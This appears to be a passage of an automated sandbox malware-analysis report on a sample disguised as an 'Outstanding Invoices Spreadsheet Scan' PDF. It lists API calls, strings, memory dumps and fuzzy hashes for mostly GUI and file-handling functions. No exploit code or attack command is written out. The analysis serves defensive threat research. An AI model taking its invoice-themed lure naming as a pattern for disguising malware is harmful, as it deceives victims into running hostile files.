                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 1322021666-1919597938
                                                                              • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                              • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                              • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                              • __wsplitpath.LIBCMT ref: 0045DF54
                                                                              • _wcscat.LIBCMT ref: 0045DF6C
                                                                              • _wcscat.LIBCMT ref: 0045DF7E
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                              • _wcscpy.LIBCMT ref: 0045E019
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3201719729-438819550
                                                                              • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                              • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2485277191-404129466
                                                                              • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                              • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                              APIs
                                                                              • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                              • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                              • strncnt.LIBCMT ref: 00428646
                                                                              • strncnt.LIBCMT ref: 0042865A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: strncnt$CompareErrorLastString
                                                                              • String ID:
                                                                              • API String ID: 1776594460-0
                                                                              • Opcode ID: 3d5b9ba0c92f4fe6760b2a2f1ed58cc80cf4b8686974248c5a816857398c4ad7
                                                                              • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                              • Opcode Fuzzy Hash: 3d5b9ba0c92f4fe6760b2a2f1ed58cc80cf4b8686974248c5a816857398c4ad7
                                                                              • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                              APIs
                                                                              • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                              • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                              • GetWindowRect.USER32(?,?), ref: 00454688
                                                                              • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                              • GetDesktopWindow.USER32 ref: 00454708
                                                                              • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                              • GetClientRect.USER32(?,?), ref: 0045476F
                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                              • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                              • GetCursorInfo.USER32 ref: 00458E03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                              • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                              • GetFocus.USER32 ref: 004696E0
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$CtrlFocus
                                                                              • String ID: 0
                                                                              • API String ID: 1534620443-4108050209
                                                                              • Opcode ID: 89fabb7cd3855047bffa5b2414c716bee3c445f27ae5989893c1555ad3621718
                                                                              • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                              • Opcode Fuzzy Hash: 89fabb7cd3855047bffa5b2414c716bee3c445f27ae5989893c1555ad3621718
                                                                              • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00468107
                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                              • GetMenuItemCount.USER32(?), ref: 00468227
                                                                              • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                              • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                              • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                              • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                              • GetMenuItemCount.USER32 ref: 004682DC
                                                                              • SetMenuItemInfoW.USER32 ref: 00468317
                                                                              • GetCursorPos.USER32(00000000), ref: 00468322
                                                                              • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                              • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3993528054-4108050209
                                                                              • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                              • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                              • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                              • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                              APIs
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • SendMessageW.USER32(?), ref: 0046F34C
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                              • _wcscat.LIBCMT ref: 0046F3BC
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                              • DragFinish.SHELL32(?), ref: 0046F414
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 4085615965-3440237614
                                                                              • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                              • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                              • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                              • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                              • API String ID: 3832890014-4202584635
                                                                              • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                              • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                              • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                              • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004669C4
                                                                              • _wcsncpy.LIBCMT ref: 00466A21
                                                                              • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcstok.LIBCMT ref: 00466A90
                                                                                • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                              • _wcstok.LIBCMT ref: 00466B3F
                                                                              • _wcscpy.LIBCMT ref: 00466BC8
                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                              • _wcslen.LIBCMT ref: 00466D1D
                                                                              • _memset.LIBCMT ref: 00466BEE
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _wcslen.LIBCMT ref: 00466D4B
                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                              • String ID: X$HH
                                                                              • API String ID: 3021350936-1944015008
                                                                              • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                              • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                              • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                              • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F4AE
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                              • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$Sleep_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1504565804-4108050209
                                                                              • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                              • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                              • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                              • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateDestroy
                                                                              • String ID: ,$tooltips_class32
                                                                              • API String ID: 1109047481-3856767331
                                                                              • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                              • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                              • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                              • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                              APIs
                                                                              • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                              • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                              • _wcscat.LIBCMT ref: 0045CD51
                                                                              • _wcscat.LIBCMT ref: 0045CD63
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                              • _wcscpy.LIBCMT ref: 0045CE14
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
